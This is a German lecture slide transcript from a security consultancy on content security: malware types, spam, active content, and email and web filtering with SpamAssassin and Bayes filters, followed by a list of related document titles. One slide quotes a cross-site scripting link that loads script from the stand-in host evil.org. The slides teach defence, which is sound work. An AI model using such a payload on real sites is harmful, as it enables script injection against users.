Content Security. Jochen Schlichting IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Content Security

Größe: px
Ab Seite anzeigen:

Download "Content Security. Jochen Schlichting jochen.schlichting@secorvo.de. IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Content Security"

Transkript

1 IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Security Consulting GmbH, Karlsruhe Seite 1

2 Inhalt Einordnung Bedrohungen durch unerwünschte Inhalte Klassen von Malware Spam Aktive Inhalte Content Filterung bei und Webzugriffen Einsatz Ablauf Mechanismen Filterung und Schutz von sensitiven Informationen Ausblick Security Consulting GmbH, Karlsruhe Seite 2

3 Einordnung Security Consulting GmbH, Karlsruhe Seite 3

4 Einordnung beschäftigt sich mit Sicherheitsaspekten von einn- und ausgehenden Daten Erfassung, Analyse. Erkennung Verhinderung der Übertragung, Entfernung, Behebung... Übertragungswege U. a. Dateianhänge Webzugriffe U. a. Drive-by-Downloads Mobile und lokale Datenträger Sonstige Dateiübertragung Security Consulting GmbH, Karlsruhe Seite 4

5 Kritische Inhalte Malware Alias Malicious Code, Schadsoftware, bösartige Software, Computer-Viren,... Spam Alias Junk-Mail, Unsolicited Commercial , Unsolicited Bulk ,... Unerwünschte oder anstößige Inhalte Z. B. Rassismus, Pornographie, Belästigung, Mobbing,... Sensitive interne Informationen Unerwünschter Informationsabfluss Security Consulting GmbH, Karlsruhe Seite 5

6 Gefährdungen Empfang von kritischen Inhalten Gefährdung der eigenen IT-Infrastruktur Verlust von Daten Manipulation von Systemen Ausfall von Systemen Im Extremfall bis hin zur Gefährdung der Existenz der eigenen Organisation Minderung der Arbeitsproduktivität Betroffenheit und Frustration der eigenen Mitarbeiter Schadensersatzforderungen Versand von kritischen Inhalten Verlust von Geschäftsgeheimnissen Gefährdung von Geschäftspartnern, Kunden etc. Verstoß gegen Gesetze oder Rechtsvorschriften Schadensersatzforderungen, Imageverlust Security Consulting GmbH, Karlsruhe Seite 6

7 Problematik in der Praxis Quelle: Microsoft Security Intelligence Report, Volume 10, July through December 2010 Security Consulting GmbH, Karlsruhe Seite 7

8 Problematik in absoluten Zahlen Quelle: Microsoft Security Intelligence Report, Volume 10, July through December 2010 Security Consulting GmbH, Karlsruhe Seite 8

9 Bedrohungen durch unerwünschte nschte Inhalte Klassen von Malware Security Consulting GmbH, Karlsruhe Seite 9

10 Definition Computer-Virus Ein Computer-Virus ist eine nicht selbstständige Programmroutine, die sich selbst reproduziert und dadurch vom Anwender nicht kontrollierbare Manipulationen in Systembereichen, an anderen Programmen oder deren Umgebung vornimmt. Eine nicht selbstständige Programmroutine bedeutet, dass der Virus ein Wirtsprogramm benötigt. Quelle: https://www.bsi.bund.de/cln_183/contentbsi/publikationen/faltblaetter/f19kurzviren.html Security Consulting GmbH, Karlsruhe Seite 10

11 Grundelemente eines Computer- Virus Ausbreitungsteil Z. B. sich in den Bootblock eines eingelegten Datenträgers kopieren Z. B. sich selbst in eine nicht identifizierte Datei kopieren Z. B. sich selbst per an alle Adressbuchkontakte verschicken Auslöser für Schadfunktion (Trigger) Z. B. Zeitpunkt (Freitag, den 13.) Z. B. Benutzerverhalten (wenn der Benutzer eine bestimmte Datei öffnet) Z. B. Umgebung (wenn eine bestimmte Webseite online geht) Schadensroutine Z. B. Festplatte formatieren Z. B. Command&Control-Server des Angreifers im Internet kontaktieren (Rücksprung zum ursprünglichen Wirtsprogramm) Security Consulting GmbH, Karlsruhe Seite 11

12 Unterformen von Computer-Viren Datei-Viren Versteckt in Dateien mit ausführbaren Programmen Boot-Viren Versteckt im Boot-Block oder Boot-Lader auf der Festplatte Makro-Viren Versteckt im Daten-Dateien von Anwendungen mit Makro- Sprachbefehlen (typisch: Office-Makros) Stealth-Viren Mit besonderen Tarn-Mechanismen, ähnlich Rootkit-Funktionalität Polymorphe Viren Verändern bei gleicher Funktion von Infektion zu Infektion ihre Programmstruktur, um Entdeckung zu erschweren Oft in Kombination mit Verschlüsselung großer Teile des Viren- Codes Security Consulting GmbH, Karlsruhe Seite 12

13 Weitere Klassen von Malware Würmer Verbreitung aus eigener Kraft (selbst-replizierend) Unabhängig von einer Wirtsdatei Via oder über Schwachstellen anderer Netzwerkdienste Z. B. "SQL Slammer" Trojanische Pferde ( Trojaner ) Eigenständige Programme mit versteckten Schadfunktionen Rootkits Zur Verschleierung von Manipulationen im System Z. B. Unterdrückung der Anzeige von Schadcode-Prozessen Oft auch Einrichtung einer Hintertür ins System Sonderform: Hoax Kettenbrief mit Falschmeldung Verbreitung nicht selbständig, sondern über menschlichen Anwender Security Consulting GmbH, Karlsruhe Seite 13

14 Virus Hoax Virus Hoax Security Consulting GmbH, Karlsruhe Seite 14

15 Sober.c: : "Social Engineering" Wurm "Social Engineering" Wurm Security Consulting GmbH, Karlsruhe Seite 15

16 Weitere Klassen von Malware Datei-Viren Boot-Viren Makro-Viren Stealth-Viren Polymorphe Viren Würmer Trojaner Spyware Rootkits Hoax Diese Unterschiede spielen in der Praxis keine Rolle Security Consulting GmbH, Karlsruhe Seite 16

17 Malware in der Praxis Heute praktisch immer in Mischformen Kombination von Viren-, Wurm-, Trojaner- und Rootkit-Funktionalität Beispiel: Spam-Mail lockt Anwender auf eine manipulierte Webseite Drive-By-Infektion erfolgt über Schwachstelle im Browsers oder in einem Plugin oder einer Anwendung, die der Browser automatisch aufruft Z. B. PDF-Reader, Flash,... Payload der initialen Infektion ist ein Bootloader, der die Systemumgebung prüft und einen passenden Trojaner nachlädt Der Trojaner verankert sich mit Rootkit-Funktionalität im System und macht den befallenen Rechner zum Teil eines Bot-Netzes Über das Bot-Netz werden für Manipulationen anfällige Webserver gesucht und übernommen und Spam versendet Und so weiter und so fort... Abkürzungen PDF Portable Document Format Security Consulting GmbH, Karlsruhe Seite 17

18 Was ist Spam? Ein Nahrungsmittel Ein Sketch der Monty Pythons Massenpostings in den Usenet News, üblicherweise Werbung Unerwünscht empfangene s On the Junk Mail Problem (J. Postel, RFC 706, Nov. 1975!) UCE: Unsolicited Commercial UBE: Unsolicited Bulk Heute enthalten über 90% aller s Spam Abkürzungen RFC Request for Comment Quellen Antispam-Studie des BSI, 2005: Security Consulting GmbH, Karlsruhe Seite 18

19 Spam heute Spam als Geschäftsmodell Mit Spam lässt sich sehr viel Geld verdienen Wenige große Verursacher Spam zum Schnäppchenpreis Spam und Malware Spam selbst wird meist nicht zu Malware gerechnet Aber: starke Querbeziehungen zwischen Spam und Malware Spam ist (auch) Mittel für Phishing, Verbreitung von Malware etc. Botnetze sind (auch) Mittel zum Versand von Spam-Mails Technische Trends Greylisting funktioniert... noch Spammer setzen auf Einweg-IP-Adressen Gehackte Privat-PCs statt offene Relays Fast flux : Ändern der DNS-Einträge im Minutentakt Abkürzungen RFC Request for Comment Quellen Antispam-Studie des BSI, 2005: Security Consulting GmbH, Karlsruhe Seite 19

20 Warum bekomme ich Spam? Warum bekomme ich Spam? Security Consulting GmbH, Karlsruhe Seite 20

21 im WWW Malware und unerwünschte Inhalte per Webzugriff Ähnliche Problematik und ähnliche Mechanismen wie bei E- Mail, aber Zusätzlich aktive Inhalte (Java, ActiveX, Flash etc.) und Cookies Anwender wartet (inter-)aktiv auf Filter-Ergebnis Benutzerschnittstelle, z. B. Hinweise, Fortschrittsanzeige Grenzen verschwimmen HTML-formatierte s über Browser dargestellt Teilweise auch mit JavaScript etc. Inhalte erst beim Betrachten der via HTTP geladen Web-Mailer: Hintertür an SMTP-Gateways vorbei Im Unternehmen: z. B. Outlook Web Access oder inotes/domino Web Zugriff in der Regel geschützt über SSL/TLS Diverse Fre Provider Abkürzungen HTTP HyperText Transfer Protocol SMTP Simple Mail Transfer Protocol WWW World Wide Web Security Consulting GmbH, Karlsruhe Seite 21

22 Aktive Inhalte Ausführbare (aktive) Inhalte von WWW-Seiten oder s Werden auf Benutzerrechner ausgeführt, daher schwer zentral zu filtern Scriptsprachen (z. B. JavaScript, VBScript) Z. B. Script-Befehle direkt in HTML-Seite oder gar in URL <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org</a> Herunterladbare Programmteile ( Mobile Code ) Java-Applets, ActiveX Controls Plug-Ins, Applikationen, z. B. Flash oder Videostreams Laden und Ausführen oft ohne Wissen des Benutzers Feststellung der Herkunft nicht ohne Weiteres möglich Nicht permanent auf System installiert Security Consulting GmbH, Karlsruhe Seite 22

23 Schutz gegen bösartige b Aktive Inhalte Schlechter Schutz gegen DoS auf lokalem System Sicherheitsmodelle Sandbox kontrolliert Zugriff auf System Vor allem: Java2 Standardeinstellung in Browser: keine Zugriffe JavaScript im Browser erlaubt keinen Dateizugriff ActiveX Controls haben vollen Zugriff Im kommerziellen Umfeld unbrauchbar (jenseits des Intranets) Probleme: Fehlerhaftes oder kein Sicherheitsmodell (z. B. ActiveX) Fehler in der Implementierung der Sicherheitsfunktionen Lösungsansatz: Digitale Signaturen Vor allem: Java2 Abkürzungen DoS Denial of Service Security Consulting GmbH, Karlsruhe Seite 23

24 Content Filterung bei E und Webzugriffen Einsatz Ablauf Mechanismen Security Consulting GmbH, Karlsruhe Seite 24

25 Ansätze zur Abwehr von Malware (Abschottung von Systemen) Lokale Viren -Scans Content-Filterung bei der Übertragung Gleichermaßen gegen Malware wie gegen Spam und Informationsabfluss (Verhaltensanalyse von unbekannter Software) (Awareness-Maßnahmen bei Mitarbeitern) Security Consulting GmbH, Karlsruhe Seite 25

26 Lokale Viren -Scans (Malware- Scans) On-Access-Scan Überprüfung bei Zugriff auf Dateien (lesend und/oder schreibend) On-Demand-Scan Regelmäßige Überprüfung sämtlicher Dateien Best Practice: Möglichst nicht abschaltbar! Zentrales Management der dezentralen Malware-Scanner Automatisches Update... der Malware-Signaturen... der Scan-Engine Security Consulting GmbH, Karlsruhe Seite 26

27 Malware-Scans Scans: : Generelle Problematik Es gibt keine 100%ig zuverlässige Scan-Methode Soweit möglich Scan-Software unterschiedlicher Hersteller einsetzen Reaktive Scans Basieren auf Malware-Signatur-Dateien Schutz (Erkennungsgüte) abhängig von Aktualität der Signatur-Dateien Hersteller müssen für jede neue oder entsprechend modifizierte Malware neue Signaturen bestimmen und verteilen Ansatz stößt zunehmend an seine Grenzen Proaktive Scans Heuristische Scans Können u. U. auch bisher nicht bekannte Malware erkennen Können daher aber auch vermehrt zu falsch-positiven Ergebnissen führen Erfordern mehr Ressourcen und Rechenzeit als Signatur-basierte Scans Abkürzungen URL Universal Resource Locator Security Consulting GmbH, Karlsruhe Seite 27

28 Wo Scannen und Filtern? Quelle: Security Consulting GmbH, Karlsruhe Seite 28

29 Mögliche Filterpunkte Es kann (und sollte) an unterschiedlichen Stellen gefiltert werden Soweit möglich Scan-Software unterschiedlicher Hersteller einsetzen Geeignet: alle Stellen, an denen Daten komplett vorliegen, z. B. Firewall Gateway, Proxy-Server, -Gateway etc. Zentrale Mail- und Fileserver Dezentrale PC-Arbeitsplätze Mobile Endgeräte Ungeeignet: alle Stellen, an denen Daten nicht unter Kontrolle sind oder nicht komplett vorliegen Jenseits des Unternehmensnetzes Netzwerkinfrastruktur (Router, Switches) Spam- und Malware-Filter nutzen sehr ähnliche Ansätze Häufig in einem Produkt kombiniert Security Consulting GmbH, Karlsruhe Seite 29

30 Genereller Ablauf der Filterung 1. Erfassung von Verbindungen und übertragenen Inhalten Eingehend oder ein- und ausgehend Mögliche Blockade beim Verbindungsaufbau: Black/White/Grey- Listing 2. Inhaltsanalyse und Dekomposition Mail-Header, HTTP-Header, MIME-Parts, Anhänge Entpacken von Archiven 3. Klassifikation Virenscan / Malwarescan Inhaltsfilterung In Deutschland in der Regel mitbestimmungspflichtig, Abstimmung mit Betriebs-/Personalrat erforderlich siehe Vortrag Recht Weitere Formen der Analyse 4. Aktion / Ereignis Markierung/Ergänzung, Quarantäne oder Löschung Abkürzungen MIME Multipart Internet Mail Extensions Security Consulting GmbH, Karlsruhe Seite 30

31 1. Erfassung Durch zentralen, transparenten Proxy Zwangsumleitung aller IP-Pakete durch Firewall / Paketfilter Für HTTP / SMTP, ggf. auch POP3, IMAP Durch Content-Filter als Mail-Relay Standardaufbau in Verbindung mit Firewall Firewall unterbindet direkten Mailtransfer Content-Filter im Internet als Mailserver sichtbar Auf zentralem Mailsystem Content-Filter / Virenscanner integriert in zentrale Mailserver Vorteil: auch rein interne Mails werden erfasst Nachteile: relative enge Integration in Mailsystem, ggf. Anpassungen bei Versionswechsel notwendig, zusätzliche Belastung des zentralen Mailsystems Abkürzungen IMAP Internet Message Access Protocol POP3 Post Office Protocol version 3 SMTP Simple Mail Transfer Protocol Security Consulting GmbH, Karlsruhe Seite 31

32 1. Erfassung Durch zentralen, transparenten Proxy Zwangsumleitung aller IP-Pakete durch Firewall / Paketfilter Für HTTP / SMTP, ggf. auch POP3, IMAP Durch Content-Filter als Mail-Relay Zentrale Filter sind unabdingbar Standardaufbau in Verbindung mit Firewall Firewall unterbindet direkten Mailtransfer Content-Filter im Internet als Mailserver sichtbar Auf zentralem Mailsystem Content-Filter / Virenscanner integriert in zentrale Mailserver Vorteil: auch rein interne Mails werden erfasst Nachteile: relative enge Integration in Mailsystem, ggf. Anpassungen bei Versionswechsel notwendig, zusätzliche Belastung des zentralen Mailsystems Abkürzungen IMAP Internet Message Access Protocol POP3 Post Office Protocol version 3 SMTP Simple Mail Transfer Protocol Security Consulting GmbH, Karlsruhe Seite 32

33 1. Black/White/Grey-Listing Online-Check der IP-Adresse beim Verbindungsaufbau Gegen eine Realtime Blacklist (RBL) Check bzgl. offener Proxies, Dial-up-Adressbereichen, etc. Hoher Pflegeaufwand! Wer pflegt RBLs? Gefahr von ungewollten Blockaden! Gegen eine Whitelist Nur Mailserver bekannter Unternehmen Hoher Pflegeaufwand, praktisch meist nicht durchsetzbar Greylisting Erzwungene Zeitverzögerung beim Sendeversuch als temporäre Blockade Keine Zuverlässigkeitsprobleme: Setzt lediglich vollständig SMTP-konformes Verhalten des Senders voraus bei Spam-Versand oft (noch) nicht der Fall Für den Administrator mit relativ geringem Aufwand konfigurierbar Kann in jeder der drei Formen den Mail-Server erheblich entlasten Abkürzungen IP Internet Protocol RBL Realtime Blackhole List SMTP Simple Mail Transfer Protocol Security Consulting GmbH, Karlsruhe Seite 33

34 2. Analyse der Header Auswerten aller (Mail) Headereinträge From, To, Cc, Subject, Date Mail-Adressen: To: Sehr leicht fälschbar Ungültige / gefälschte Host-/Domainnamen Ungültige / gefälschte Received-Zeilen Zeitzonen: (EST) IP-Adressen: Message-ID Maximale Anzahl an Empfängern MIME-Header-Felder (Nicht-) Vorhandensein bestimmter Header-Felder Vorsicht, um keine Mailinglisten auszusperren Abkürzungen Cc Carbon Copy EST Eastern Standard Time ID Identification IP Internet Protocol MIME Multipurpose Internet Mail Extensions Security Consulting GmbH, Karlsruhe Seite 34

35 2. Weitere Analyse und Dekomposition MIME-Parts Alternative Darstellung: Text und/oder HTML, RTF,... Anhänge S/MIME Verschlüsselung und/oder Signatur Beliebige Schachtelung möglich Dateiformate angehängter Dateien Anhand von Datei-Endung, MIME-Typ und/oder Formatprüfung Für den Administrator mit relativ geringem Aufwand konfigurierbar Archiv- und Containerformate Z. B. ZIP, RAR, TAR, CAB, JAR,... Rekursives Entpacken notwendig Kompressionsbomben sprengen Speicherplatz Rekursionsbomben entpacken unendlich oft sich zu sich selbst Abkürzungen CAB Cabinet HTML HyperText Markup Language JAR Java Archive MIME Multipurpose Internet Mail Extensions RAR (Eugene) Roshal's Archiver RTF Rich Text Format S/MIME Secure MIME TAR Tape Archive Security Consulting GmbH, Karlsruhe Seite 35

36 3. Textanalyse: Inhaltsfilterung Lexikalische Analyse / Schlüsselwörter / Muster-Suche Scannen nach bestimmten Schlüsselwörtern oder Textpassagen...impr0ve your s.x life... Für den Administrator mit relativ geringem Aufwand konfigurierbar Schnelle Eingreifmöglichkeit bei neuen Würmern Missbrauchsmöglichkeiten liegen auf der Hand Scannen nach bestimmten URLs URLs, von denen Inhalt nachgeladen werden soll Kann ggf. mit lexikalischer Analyse mit erledigt werden Scannen nach bestimmten (HTML-) Formatierungen Z. B. nur Grossbuchstaben, viele Bilder, etc. Relativ hohe Fehlerrate, schwierige eindeutige Klassifizierung Individuelle Filter? Security Consulting GmbH, Karlsruhe Seite 36

37 3. Textanalyse: Bayes Filter Statistisches Verfahren zur Spam-Klassifikation Geht zurück auf den Satz von Bayes über bedingte Wahrscheinlichkeiten Wie hoch ist die Wahrscheinlichkeit, dass eine eingehende Spam ist, wenn sie eine bestimmte Wortkombination enthält? Bewertet anhand zuvor empfangener s ( Training des Filters) Benötigt gewisse Mindestanzahl von vorklassifizierten Spam- und Nicht-Spam-Mails Kann bei jeder neu klassifizierten Mail weiter lernen Häufig mit Scoring-Verfahren kombiniert Besonders, um falsch-positive Ergebnisse zu reduzieren Unscharfe Prüfsummen des Inhalts ( fuzzy checksums ) Gewichteter Anteil des Bayes-Filters Gewichteter Anteil weiterer Filtermethoden Gewichtung und Schwellwert können individuell variiert werden Security Consulting GmbH, Karlsruhe Seite 37

38 3. Weitere Analysekriterien Typ von Dateianhängen Besonderes Augenmerk auf ausführbaren Dateitypen Problem: Was ist alles ausführbar (.cmd,.scr,.pif,...)? Multimedia lässt Grenzen verschwimmen Skript-Code in HTML-Dateien, Flash-Dateien, PDF-Dateien... Anzahl und Größe von Dateianhängen Kompletter HTTP-Strom (WAF) Virenscan / Malwarescan Zahlreiche Tools verfügbar Z. B. SpamAssassin mit diversen Plug-Ins Abkürzungen HTML HyperText Markup Language Security Consulting GmbH, Karlsruhe Seite 38

39 4. Aktion / Ereignis Behandlung der geprüften je nach Ergebnis der Klassifikation Ggf. Modifikation der geprüften Entfernung von Viren Disclaimer anfügen (von zweifelhaftem Nutzen) Markierung für lokale Filterung Subject-Tag (z. B. [VIRUS FOUND] Originalbetreff ) Erweiterte Header-Felder (z. B. X-infected: yes ) Zurückweisen, Weiterleiten, Quarantäne oder Löschen Rechtlichen Rahmen beachten Benachrichtigungsmails Erfordern genaue Planung An Absender, Empfänger und/oder Administratoren Sollte nicht selbst in Spam ausarten Security Consulting GmbH, Karlsruhe Seite 39

40 Beispiel: SpamAssassin From: To: Subject: **SPAM** =?ISO JP?B?NDAbJEI6UDBKPmUkRz80JGI/SEJOJGJMfiRkJDUkbCQ/JCRKfSRPGyhC?= =?ISO JP?B?WxskQkx+JGQkNzJIGyhCXRskQiRYJCoxWyQ3MjwkNSQkISMbKEI=?= Date: Mon, 11 Aug :04: [...] X-Spam-Prev-Subject: =?ISO JP?B?NDAbJEI6UDBKPmUkRz80JGI/SEJOJGJMfiRkJDUkbCQ/JCRKfSRPGyhC?= =?ISO JP?B?WxskQkx+JGQkNzJIGyhCXRskQiRYJCoxWyQ3MjwkNSQkISMbKEI=?= X-Spam-Flag: YES X-Spam-Checker-Version: SpamAssassin ( ) on connect.secorvo.de X-Spam-Level: ****** X-Spam-Status: Yes, score=7.0 required=2.9 tests=date_in_past_06_12, FORGED_MUA_OUTLOOK,FORGED_YAHOO_RCVD,FROM_ENDS_IN_NUMS,NO_REAL_NAME, PLING_QUERY autolearn=no version=3.0.4 X-Spam-Report: * 0.2 NO_REAL_NAME From: does not include a real name * 0.5 FROM_ENDS_IN_NUMS From: ends in numbers * 0.9 PLING_QUERY Subject has exclamation mark and question mark * 0.2 DATE_IN_PAST_06_12 Date: is 6 to 12 hours before Received: date * 2.2 FORGED_YAHOO_RCVD 'From' yahoo.com does not match 'Received' headers * 3.0 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook [...] Security Consulting GmbH, Karlsruhe Seite 40

41 Filterung und Schutz von sensitiven Informationen Security Consulting GmbH, Karlsruhe Seite 41

42 Content-Filter und Verschlüsselung sselung Unternehmens-Netz???...teile ich Ihnen mit... Arbeitsplatz-PC Q a$tlk %3ß9 8ü95??? a$tlk %3ß9 8ü95 "Internet" a$tlk %3ß9 8ü95 Zentrale Content-Filterung und Ende-zu-Ende Verschlüsselung sind unverträgliche Mechanismen Eingehend wie ausgehend Security Consulting GmbH, Karlsruhe Seite 42

43 Content-Filter und Verschlüsselung sselung Grundsätzlicher Lösungsansatz: Content-Filter beim Endpunkt der verschlüsselten Kommunikation Bei Priorität Ende-zu-Ende Verschlüsselung Dezentrales Content-Filtering und dezentraler Content-Scan Bei Priorität zentraler Content-Filter Zentrales Verschlüsselungs-Gateway kombiniert mit zentralem Content-Filter Zusatznutzen: Vereinfacht Vertretung und Delegation, Message Recovery Kann Ende-zu-Ende Verschlüsselung nicht in allen Fällen ersetzen Ansätze zum Unterbrechen einer Ende-zu-Ende-Verschlüsselung Umverschlüsseln an zentralem -Verschlüsselungs-Gateway SSL-Breaker für HTTPS-geschützte Webzugriffe Unterstützen i. d. R. keine SSL/TLS-Client-Authentifikation Erfordert Zugriff auf Schlüssel und Vertrauenskonfig. der Anwender Sicherheitstechnische und rechtliche Konsequenzen beachten! Abkürzungen HTTPS Secure HyperText Transfer Protocol SSL Secure Socket Layer TLS Transport Layer Security Security Consulting GmbH, Karlsruhe Seite 43

44 Ausblick Security Consulting GmbH, Karlsruhe Seite 44

45 Ausblick Filtern ist nicht trivial Es muss zentral und dezentral gefiltert werden Filtern von s reicht nicht aus Produkte aus verschiedenen Richtungen wachsen durch Erweiterungen zusammen Content-Filter klassisch als Unterfunktion einer Firewall Viele unterschiedliche Protokolle sind zu filtern Web Application Firewalls (WAF) nehmen an Bedeutung zu Data Leakage Prevention (DLP) als Zukunft der? Neue (und alte) Herausforderungen Nadelöhreigenschaft Skalierbarkeit, Hochverfügbarkeit Rechtliche Rahmenbedingungen beachten Vorsicht beim Blockieren Abkürzungen DLP Data Leakage Prevention, Dats Loss Prevention WAF Web Application Firewall Security Consulting GmbH, Karlsruhe Seite 45

46 Security Consulting GmbH, Karlsruhe Seite 46

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Personal Firewall (PFW) und Virenscanner Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Gliederung Personal Firewall Virenscanner 1. Zweck einer Firewall 2. Funktionsweise einer

Mehr

Anti-Spam-Tools. Gliederung. Stefan Appenburg, René Marx, Michael Günther WS 2004/05

Anti-Spam-Tools. Gliederung. Stefan Appenburg, René Marx, Michael Günther WS 2004/05 Anti-Spam-Tools Stefan Appenburg, René Marx, Michael Günther WS 2004/05 1 Einleitung Anforderungen Spamcop Spampal Hidemail Outlook-Filter Gliederung 2 Einleitung Weltweit bieten mehr als 70 Hersteller

Mehr

Spam-Filterung Sonderveranstaltung Dr. Gabriele Dobler, Dr. Reiner Fischer, Ulrich Nehls, Gunther Heintzen 12.Dezember 2003

Spam-Filterung Sonderveranstaltung Dr. Gabriele Dobler, Dr. Reiner Fischer, Ulrich Nehls, Gunther Heintzen 12.Dezember 2003 Spam-Filterung Sonderveranstaltung Dr. Gabriele Dobler, Dr. Reiner Fischer, Ulrich Nehls, Gunther Heintzen 12.Dezember 2003 12.12.2003 1 Übersicht Entwicklung des Mail-Aufkommens Ziele des RRZE Spam-Bewertung

Mehr

Malware - Viren, Würmer und Trojaner

Malware - Viren, Würmer und Trojaner Department of Computer Sciences University of Salzburg June 21, 2013 Malware-Gesamtentwicklung 1984-2012 Malware-Zuwachs 1984-2012 Malware Anteil 2/2011 Malware Viren Würmer Trojaner Malware Computerprogramme,

Mehr

Computerviren, Würmer, Trojaner

Computerviren, Würmer, Trojaner Computerviren, Würmer, Trojaner Computerviren, Würmer und Trojaner zählen zur Familie unerwünschter bzw. schädlicher Programme, der so genannten Malware. Diese Programme können sich selbst verbreiten und

Mehr

Internet: Was ist das? - Routing

Internet: Was ist das? - Routing Internet: Was ist das? - Routing Auch Router Server Router Client ClientServer? Grundlagen Internet Sicherheit Angriffe Schutz Internet Map, The Opte Project Internet: Was ist das? - Netzwerk Peer-to-Peer

Mehr

Email: Systeme und Möglichkeiten an der Universität Bayreuth. Jour fixe für IT Verantwortliche SS 2012

Email: Systeme und Möglichkeiten an der Universität Bayreuth. Jour fixe für IT Verantwortliche SS 2012 Email: Systeme und Möglichkeiten an der Universität Bayreuth Jour fixe für IT Verantwortliche SS 2012 1 Übersicht: Emailvolumen Zwei getrennte Mailsysteme für Studenten und Mitarbeiter Mailbenutzer mit

Mehr

- Blockieren der E-Mail x x - Entfernen von Anhängen x x Hochladen von Anhängen ins Web Portal mit optionaler Quarantäne.

- Blockieren der E-Mail x x - Entfernen von Anhängen x x Hochladen von Anhängen ins Web Portal mit optionaler Quarantäne. Inhalt Anti-Spam Features... 2 Signatur und Verschlüsselung Features... 3 Large File Transfer 4... 5 Fortgeschrittenes E-Mail-Routing... 6 Allgemeine Features... 6 Reporting... 7 www.nospamproy.de Feature

Mehr

Protokolle. Konrad Rosenbaum, 2006/7 protected under the GNU GPL & FDL

Protokolle. Konrad Rosenbaum, 2006/7 protected under the GNU GPL & FDL TCP/IP: Standard Protokolle Konrad Rosenbaum, 2006/7 DNS - Domain Name System hierarchische, global verteilte Datenbank löst Namen in IP-Adressen auf Host hat einen primären Nameserver, der Fragen selbst

Mehr

Security made simple.

Security made simple. Security made simple. Sophos UTM Web- und Spamfilter in der Praxis Christoph Riese, Presales Engineer 1 Lost on the Road to Security? 2 Complete Security, made simple Complete Security Network Server Devices

Mehr

Lange Nacht der Wissenschaften 2007. Gefahr aus dem Internet Wie kann ich mein Windows System schützen?

Lange Nacht der Wissenschaften 2007. Gefahr aus dem Internet Wie kann ich mein Windows System schützen? Lange Nacht der Wissenschaften 2007 Gefahr aus dem Internet Wie kann ich mein Windows System schützen? Manuel Selling Humboldt Universität zu Berlin ZE Computer und Medienservice Abt. Systemsoftware und

Mehr

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1 Sicherheit Bedeutung Gefahren Mag. Friedrich Wannerer 1 Sicherheitsbegriff Unversehrtheit und Vertraulichkeit persönlicher Daten Datenschutzgesetz 2000 Bedrohungen q Dialer, Spam, Spyware, Viren, Würmer,

Mehr

Internet-Sicherheit. Browser, Firewalls und Verschlüsselung. von Kai Fuhrberg. 2. Auflage

Internet-Sicherheit. Browser, Firewalls und Verschlüsselung. von Kai Fuhrberg. 2. Auflage Internet-Sicherheit Browser, Firewalls und Verschlüsselung von Kai Fuhrberg 2. Auflage Internet-Sicherheit Fuhrberg schnell und portofrei erhältlich bei beck-shop.de DIE FACHBUCHHANDLUNG Hanser München

Mehr

Karlsruher IT-Sicherheitsinitiative - 26. April 2001. "For your eyes only" Sichere E-Mail in Unternehmen. Dr. Dörte Neundorf neundorf@secorvo.

Karlsruher IT-Sicherheitsinitiative - 26. April 2001. For your eyes only Sichere E-Mail in Unternehmen. Dr. Dörte Neundorf neundorf@secorvo. Karlsruher IT-Sicherheitsinitiative - 26. April 2001 "For your eyes only" Sichere E-Mail in Unternehmen Dr. Dörte Neundorf neundorf@secorvo.de Secorvo Security Consulting GmbH Albert-Nestler-Straße 9 D-76131

Mehr

E-Mails automatisch lesen. Markus Dahms

E-Mails automatisch lesen. Markus Dahms <dahms@fh-brandenburg.de> 1 Gliederung 1. Der Weg der E-Mails 2. fetchmail: Einsammeln 3. procmail: Filtern & Sortieren 4. spamassassin: Entsorgen 5. Andere hilfreiche Werkzeuge 6. Die mächtigste Waffe:

Mehr

Gliederung Erkennung anhand des Absenders. Methoden zur Filterung und Blockung. Alexandru Garnet

Gliederung Erkennung anhand des Absenders. Methoden zur Filterung und Blockung. Alexandru Garnet Methoden zur Filterung und Blockung von Mails Alexandru Garnet Seminar Intenetkommunikation WS 2004/2005 Prof. Dr. Martin Leischner 1 Gliederung Erkennung anhand des Absenders Whitelist/Blacklist Realtime

Mehr

Viren, Würmer, Trojaner

Viren, Würmer, Trojaner Viren, Würmer, Trojaner Was muss ich beachten? Ralf Benzmüller G DATA Software AG Überblick Einleitung Grundlegende Begriffe Gefahrensituation Zahlen und Daten Trends Infektionsmechanismen Viren Würmer

Mehr

DesktopSecurity. Schutz für den Windows-Arbeitsplatz PCs, Workstations und Laptops gegen Bedrohungen aus dem Internet

DesktopSecurity. Schutz für den Windows-Arbeitsplatz PCs, Workstations und Laptops gegen Bedrohungen aus dem Internet DesktopSecurity Schutz für den Windows-Arbeitsplatz PCs, Workstations und Laptops gegen Bedrohungen aus dem Internet Ralf Niederhüfner PROLINK internet communications GmbH 1 Desktop Security Szenarien

Mehr

Informationssicherheit

Informationssicherheit Informationssicherheit Sibylle Schwarz Westsächsische Hochschule Zwickau Dr. Friedrichs-Ring 2a, RII 263 http://wwwstud.fh-zwickau.de/~sibsc/ sibylle.schwarz@fh-zwickau.de WS 2009/2010 Informationssicherheit

Mehr

email, Applikationen, Services Alexander Prosser

email, Applikationen, Services Alexander Prosser email, Applikationen, Services Alexander Prosser WWW für Menschen und Maschinen SEITE 2 (C) ALEXANDER PROSSER WWW für Menschen (1) Mensch gibt Adresse ein, z.b. evoting.at oder klickt Link an (2) Server

Mehr

Spamschutz effektiv: Technik

Spamschutz effektiv: Technik Spamschutz effektiv: Technik Was ist Spam überhaupt? Wie arbeiten Spammer? Welche Abwehrmöglichkeiten gibt es präventiv reaktiv Beispiele Was bringt es? What's next: SPF und DKIM Zusammenfassung / Fazit

Mehr

(c) 2003 by Lars Witter

